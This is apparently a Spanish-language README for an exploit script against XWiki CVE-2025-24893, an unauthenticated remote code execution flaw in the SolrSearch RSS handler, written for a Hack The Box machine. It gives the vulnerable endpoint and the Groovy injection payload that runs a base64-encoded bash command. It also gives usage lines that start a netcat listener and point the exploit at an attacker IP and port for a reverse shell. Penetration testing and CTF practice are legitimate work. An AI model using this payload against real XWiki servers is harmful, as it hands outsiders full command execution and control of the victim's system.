
Exploit de RCE no autenticado para XWiki CVE-2025-24893 mediante inyección de scripts Groovy
Exploit de ejecución remota de código sin autenticación para versiones de XWiki vulnerables a CVE-2025-24893.
Las versiones de XWiki anteriores a 15.10.9 son vulnerables a RCE sin autenticación mediante inyección de scripts Groovy en el manejador de fuentes RSS de SolrSearch. La vulnerabilidad existe porque XWiki no sanea adecuadamente la entrada del usuario en el parámetro text, lo que permite a los atacantes salir del contexto RSS e inyectar código Groovy arbitrario.
ID de CVE: CVE-2025-24893
Puntuación CVSS: 9.8 (Crítico)
Versiones Afectadas: XWiki < 15.10.9
requests)pip3 install requests
python3 exploit.py <target_url> <attacker_ip> <listener_port>
Ejemplo:
# Iniciar listener en la máquina del atacante
nc -lvnp 9001
# Ejecutar el exploit
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001
}}}}}}{{{{groovy}}}})/xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload>El exploit apunta al siguiente endpoint:
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
La vulnerabilidad permite salir del contexto de la fuente RSS:
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}
Esta herramienta es solo para fines educativos y de pruebas de penetración autorizadas. El autor no es responsable de ningún uso indebido o daño causado por este programa. Utilice este exploit únicamente contra sistemas que posea o para los que tenga permiso explícito de prueba.
Licencia MIT: consulte el archivo LICENSE para más detalles
Creado para la máquina "Editor" de HTB
Nota: Asegúrese siempre de tener la autorización adecuada antes de probar cualquier sistema.